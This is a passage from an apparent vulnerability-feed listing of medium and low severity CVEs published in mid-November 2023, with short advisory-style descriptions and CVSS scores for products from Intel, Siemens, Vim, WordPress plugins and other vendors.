Failure to validate the value in APCB may allow a privileged attacker to tamper with the APCB token to force an out-of-bounds memory read potentially resulting in a denial of service.

4.9
2023-11-14 CVE-2023-44318 Siemens Use of Hard-coded Cryptographic Key vulnerability in Siemens products

Affected devices use a hardcoded key to obfuscate the configuration backup that an administrator can export from the device.

4.9
2023-11-14 CVE-2023-44319 Siemens Reversible One-Way Hash vulnerability in Siemens products

Affected devices use a weak checksum algorithm to protect the configuration backup that an administrator can export from the device.

4.9
2023-11-13 CVE-2023-31219 Wpchill Server-Side Request Forgery (SSRF) vulnerability in Wpchill Download Monitor

Server-Side Request Forgery (SSRF) vulnerability in WPChill Download Monitor.This issue affects Download Monitor: from n/a through 4.8.1.

4.9
2023-11-13 CVE-2023-37978 Riverside Server-Side Request Forgery (SSRF) vulnerability in Riverside Http Headers

Server-Side Request Forgery (SSRF) vulnerability in Dimitar Ivanov HTTP Headers.This issue affects HTTP Headers: from n/a through 1.18.11.

4.9
2023-11-13 CVE-2023-38515 Church Admin Project Server-Side Request Forgery (SSRF) vulnerability in Church Admin Project Church Admin

Server-Side Request Forgery (SSRF) vulnerability in Andy Moyle Church Admin.This issue affects Church Admin: from n/a through 3.7.56.

4.9
2023-11-16 CVE-2023-46213 Splunk Cross-site Scripting vulnerability in Splunk Cloud and Splunk

In Splunk Enterprise versions below 9.0.7 and 9.1.2, ineffective escaping in the “Show syntax Highlighted” feature can result in the execution of unauthorized code in a user’s web browser.

4.8
2023-11-16 CVE-2023-32957 Dazzlersoft Cross-site Scripting vulnerability in Dazzlersoft Team Members Showcase

Auth.

4.8
2023-11-16 CVE-2023-47245 Marcomilesi Cross-site Scripting vulnerability in Marcomilesi Anac XML Viewer

Auth.

4.8
2023-11-16 CVE-2023-47511 SO WP Cross-site Scripting vulnerability in So-Wp Pinyin Slugs

Auth.

4.8
2023-11-15 CVE-2023-5381 Webtechstreet Cross-site Scripting vulnerability in Webtechstreet Elementor Addon Elements

The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in versions up to, and including, 1.12.7 due to insufficient input sanitization and output escaping.

4.8
2023-11-15 CVE-2023-5985 Schneider Electric Cross-site Scripting vulnerability in Schneider-Electric Ion8650 Firmware and Ion8800 Firmware

A CWE-79 Improper Neutralization of Input During Web Page Generation vulnerability exists that could cause compromise of a user’s browser when an attacker with admin privileges has modified system values.

4.8
2023-11-14 CVE-2023-46026 Phpgurukul Cross-site Scripting vulnerability in PHPgurukul Teacher Subject Allocation Management System 1.0

Cross Site Scripting (XSS) vulnerability in profile.php in phpgurukul Teacher Subject Allocation Management System 1.0 allows attackers to run arbitrary code via the 'adminname' and 'email' parameters.

4.8
2023-11-14 CVE-2023-47528 Sajjad67 Cross-site Scripting vulnerability in Sajjad67 WP Edit Username

Auth.

4.8
2023-11-14 CVE-2023-47533 Wpdevart Cross-site Scripting vulnerability in Wpdevart Countdown and Countup, Woocommerce Sales Timer

Auth.

4.8
2023-11-14 CVE-2023-47546 Walterpinem Cross-site Scripting vulnerability in Walterpinem Oneclick Chat to Order

Auth.

4.8
2023-11-14 CVE-2023-47554 Denk Cross-site Scripting vulnerability in Denk Actueel Financieel Nieuws

Auth.

4.8
2023-11-14 CVE-2023-47646 Cedcommerce Cross-site Scripting vulnerability in Cedcommerce Recently Viewed and Most Viewed products

Auth.

4.8
2023-11-14 CVE-2023-47653 Theweb Designs Cross-site Scripting vulnerability in Theweb-Designs TWB Woocommerce

Auth.

4.8
2023-11-14 CVE-2023-47658 Actpro Cross-site Scripting vulnerability in Actpro Extra Product Options for Woocommerce

Auth.

4.8
2023-11-14 CVE-2023-47660 Wpwham Cross-site Scripting vulnerability in Wpwham Product Visibility BY Country for Woocommerce

Auth.

4.8
2023-11-14 CVE-2023-46099 Siemens Cross-site Scripting vulnerability in Siemens Simatic PCS NEO 3.0

A vulnerability has been identified in SIMATIC PCS neo (All versions < V4.1).

4.8
2023-11-14 CVE-2023-31754 Optimizely Cross-site Scripting vulnerability in Optimizely CMS

Optimizely CMS UI before v12.16.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the Admin panel.

4.8
2023-11-14 CVE-2023-47628 Datahub Project Insufficient Session Expiration vulnerability in Datahub Project Datahub

DataHub is an open-source metadata platform.

4.8
2023-11-14 CVE-2023-47657 Grandplugins Cross-site Scripting vulnerability in Grandplugins WOO Quick View and BUY NOW

Auth.

4.8
2023-11-14 CVE-2023-47662 Goldbroker Cross-site Scripting vulnerability in Goldbroker Live Gold Price & Silver Price Charts Widgets

Auth.

4.8
2023-11-16 CVE-2023-6176 Linux
Redhat
NULL Pointer Dereference vulnerability in multiple products

A null pointer dereference flaw was found in the Linux kernel API for the cryptographic algorithm scatterwalk functionality.

4.7
2023-11-14 CVE-2023-22310 Intel Race Condition vulnerability in Intel Aptio V Uefi Firmware Integrator Tools 5.27.03.0003/5.27.06.0017

Race condition in some Intel(R) Aptio* V UEFI Firmware Integrator Tools may allow an authenticated user to potentially enable denial of service via local access.

4.7
2023-11-13 CVE-2023-47801 Clickstudios Incorrect Permission Assignment for Critical Resource vulnerability in Clickstudios Passwordstate 9.5/9.6

An issue was discovered in Click Studios Passwordstate before 9811.

4.7
2023-11-14 CVE-2023-20526 AMD Unspecified vulnerability in AMD products

Insufficient input validation in the ASP Bootloader may enable a privileged attacker with physical access to expose the contents of ASP memory potentially leading to a loss of confidentiality.

4.6
2023-11-14 CVE-2023-24588 Intel Unspecified vulnerability in Intel products

Exposure of sensitive information to an unauthorized actor in firmware for some Intel(R) Optane(TM) SSD products may allow an unauthenticated user to potentially enable information disclosure via physical access.

4.6
2023-11-14 CVE-2023-27879 Intel Unspecified vulnerability in Intel products

Improper access control in firmware for some Intel(R) Optane(TM) SSD products may allow an unauthenticated user to potentially enable information disclosure via physical access.

4.6
2023-11-14 CVE-2022-41659 Intel Unspecified vulnerability in Intel Unison

Improper access control for some Intel Unison software may allow a privileged user to potentially enable denial of service via local access.

4.4
2023-11-14 CVE-2022-46298 Intel Incomplete Cleanup vulnerability in Intel Unison Software

Incomplete cleanup for some Intel Unison software may allow a privileged user to potentially enable denial of service via local access.

4.4
2023-11-14 CVE-2022-46301 Intel Improper Initialization vulnerability in Intel Unison Software

Improper Initialization for some Intel Unison software may allow a privileged user to potentially enable denial of service via local access.

4.4
2023-11-14 CVE-2023-22327 Intel Out-of-bounds Write vulnerability in Intel products

Out-of-bounds write in firmware for some Intel(R) FPGA products before version 2.8.1 may allow a privileged user to potentially enable information disclosure via local access.

4.4
2023-11-14 CVE-2023-24587 Intel Unspecified vulnerability in Intel products

Insufficient control flow management in firmware for some Intel(R) Optane(TM) SSD products may allow a privileged user to potentially enable denial of service via local access.

4.4
2023-11-14 CVE-2023-39411 Intel Improper Input Validation vulnerability in Intel Unison Software

Improper input validationation for some Intel Unison software may allow a privileged user to potentially enable denial of service via local access.

4.4
2023-11-14 CVE-2023-40220 Intel Unspecified vulnerability in Intel Nuc6Cayh Firmware and Nuc6Cays Firmware

Improper buffer restrictions in some Intel(R) NUC BIOS firmware may allow a privileged user to potentially enable information disclosure via local access.

4.4
2023-11-14 CVE-2023-40540 Intel Unspecified vulnerability in Intel products

Non-Transparent Sharing of Microarchitectural Resources in some Intel(R) NUC BIOS firmware may allow a privileged user to potentially enable information disclosure via local access.

4.4
2023-11-17 CVE-2023-48294 Librenms Unspecified vulnerability in Librenms

LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring which includes support for a wide range of network hardware and operating systems.

4.3
2023-11-17 CVE-2023-44355 Adobe Improper Input Validation vulnerability in Adobe Coldfusion

Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Improper Input Validation vulnerability that could result in a Security feature bypass.

4.3
2023-11-17 CVE-2020-11447 Bell Unspecified vulnerability in Bell Home HUB 3000 Firmware Sg48222070

An issue was discovered on Bell HomeHub 3000 SG48222070 devices.

4.3
2023-11-16 CVE-2023-48231 VIM
Fedoraproject
Use After Free vulnerability in multiple products

Vim is an open source command line text editor.

4.3
2023-11-16 CVE-2023-48232 VIM
Fedoraproject
Improper Handling of Exceptional Conditions vulnerability in multiple products

Vim is an open source command line text editor.

4.3
2023-11-16 CVE-2023-48233 VIM
Fedoraproject
Integer Overflow or Wraparound vulnerability in multiple products

Vim is an open source command line text editor.

4.3
2023-11-16 CVE-2023-48234 VIM
Fedoraproject
Integer Overflow or Wraparound vulnerability in multiple products

Vim is an open source command line text editor.

4.3
2023-11-16 CVE-2023-48235 VIM
Fedoraproject
Integer Overflow or Wraparound vulnerability in multiple products

Vim is an open source command line text editor.

4.3
2023-11-16 CVE-2023-48236 VIM
Fedoraproject
Integer Overflow or Wraparound vulnerability in multiple products

Vim is an open source command line text editor.

4.3
2023-11-16 CVE-2023-48237 VIM
Fedoraproject
Integer Overflow or Wraparound vulnerability in multiple products

Vim is an open source command line text editor.

4.3
2023-11-16 CVE-2023-47112 Pagerduty Missing Authorization vulnerability in Pagerduty Rundeck 4.17.0/4.17.1/4.17.2

Rundeck is an open source automation service with a web console, command line tools and a WebAPI.

4.3
2023-11-16 CVE-2023-47642 Zulip Unspecified vulnerability in Zulip Server

Zulip is an open-source team collaboration tool.

4.3
2023-11-16 CVE-2023-36026 Microsoft Unspecified vulnerability in Microsoft Edge Chromium

Microsoft Edge (Chromium-based) Spoofing Vulnerability

4.3
2023-11-16 CVE-2023-6121 Redhat Out-of-bounds Read vulnerability in Redhat Enterprise Linux

An out-of-bounds read vulnerability was found in the NVMe-oF/TCP subsystem in the Linux kernel.

4.3
2023-11-15 CVE-2023-4689 Webtechstreet Cross-Site Request Forgery (CSRF) vulnerability in Webtechstreet Elementor Addon Elements

The Elementor Addon Elements plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.12.7.

4.3
2023-11-15 CVE-2023-4690 Webtechstreet Cross-Site Request Forgery (CSRF) vulnerability in Webtechstreet Elementor Addon Elements

The Elementor Addon Elements plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.12.7.

4.3
2023-11-14 CVE-2023-6124 Salesagility Server-Side Request Forgery (SSRF) vulnerability in Salesagility Suitecrm

Server-Side Request Forgery (SSRF) in GitHub repository salesagility/suitecrm prior to 7.14.2, 8.4.2, 7.12.14.

4.3
2023-11-14 CVE-2023-44320 Siemens Forced Browsing vulnerability in Siemens products

Affected devices do not properly validate the authentication when performing certain modifications in the web interface allowing an authenticated attacker to influence the user interface configured by an administrator.

4.3
2023-11-13 CVE-2023-47625 Dronecode Classic Buffer Overflow vulnerability in Dronecode PX4 Drone Autopilot 1.14.0

PX4 autopilot is a flight control solution for drones.

4.3
2023-11-13 CVE-2023-48063 Dreamer CMS Project Cross-Site Request Forgery (CSRF) vulnerability in Dreamer CMS Project Dreamer CMS 4.1.3

An issue was discovered in dreamer_cms 4.1.3.

4.3
2023-11-13 CVE-2023-38363 IBM Unspecified vulnerability in IBM Cics TX 10.1

IBM CICS TX Advanced 10.1 does not set the secure attribute on authorization tokens or session cookies.

4.3
2023-11-14 CVE-2023-36007 Microsoft Unspecified vulnerability in Microsoft Send Customer Voice Survey From Dynamics 365 9.0.0.0/9.0.0.7

Microsoft Send Customer Voice survey from Dynamics 365 Spoofing Vulnerability

4.1

11 Low Vulnerabilities

DATE CVE VENDOR VULNERABILITY CVSS
2023-11-15 CVE-2023-30954 Palantir Race Condition vulnerability in Palantir Video-Application-Server

The Gotham video-application-server service contained a race condition which would cause it to not apply certain acls new videos if the source system had not yet initialized.

3.7
2023-11-15 CVE-2023-46121 YT DLP Project HTTP Request Smuggling vulnerability in Yt-Dlp Project Yt-Dlp

yt-dlp is a youtube-dl fork with additional features and fixes.

3.7
2023-11-14 CVE-2023-6109 YOP Poll Race Condition vulnerability in Yop-Poll YOP Poll

The YOP Poll plugin for WordPress is vulnerable to a race condition in all versions up to, and including, 6.5.26.

3.7
2023-11-14 CVE-2023-22329 Intel Unspecified vulnerability in Intel products

Improper input validation in the BIOS firmware for some Intel(R) Processors may allow an authenticated user to potentially enable denial of service via adjacent access.

3.5
2023-11-14 CVE-2023-36016 Microsoft Cross-site Scripting vulnerability in Microsoft Dynamics 365

Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability

3.4
2023-11-17 CVE-2023-47072 Adobe Access of Uninitialized Pointer vulnerability in Adobe After Effects 24.0

Adobe After Effects version 24.0.2 (and earlier) and 23.6 (and earlier) are affected by an Access of Uninitialized Pointer vulnerability that could lead to disclosure of sensitive memory.

3.3
2023-11-16 CVE-2023-47060 Adobe Access of Uninitialized Pointer vulnerability in Adobe Premiere PRO

Adobe Premiere Pro version 24.0 (and earlier) and 23.6 (and earlier) are affected by an Access of Uninitialized Pointer vulnerability that could lead to disclosure of sensitive memory.

3.3
2023-11-14 CVE-2023-20519 AMD Use After Free vulnerability in AMD Genoapi Firmware and Milanpi Firmware

A Use-After-Free vulnerability in the management of an SNP guest context page may allow a malicious hypervisor to masquerade as the guest's migration agent resulting in a potential loss of guest integrity.

3.3
2023-11-14 CVE-2023-45585 Fortinet Information Exposure Through Log Files vulnerability in Fortinet Fortisiem

An insertion of sensitive information into log file vulnerability [CWE-532] in FortiSIEM version 7.0.0, version 6.7.6 and below, version 6.6.3 and below, version 6.5.1 and below, version 6.4.2 and below, version 6.3.3 and below, version 6.2.1 and below, version 6.1.2 and below, version 5.4.0, version 5.3.3 and below may allow an authenticated user to view an encrypted ElasticSearch password via debug log files generated when FortiSIEM is configured with ElasticSearch Event Storage.

3.3
2023-11-15 CVE-2023-23549 Tribe29 Unspecified vulnerability in Tribe29 Checkmk 2.0.0/2.1.0/2.2.0

Improper Input Validation in Checkmk <2.2.0p15, <2.1.0p37, <=2.0.0p39 allows priviledged attackers to cause partial denial of service of the UI via too long hostnames.

2.7
2023-11-14 CVE-2023-22313 Intel Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability in Intel products

Improper buffer restrictions in some Intel(R) QAT Library software before version 22.07.1 may allow a privileged user to potentially enable information disclosure via local access.

2.3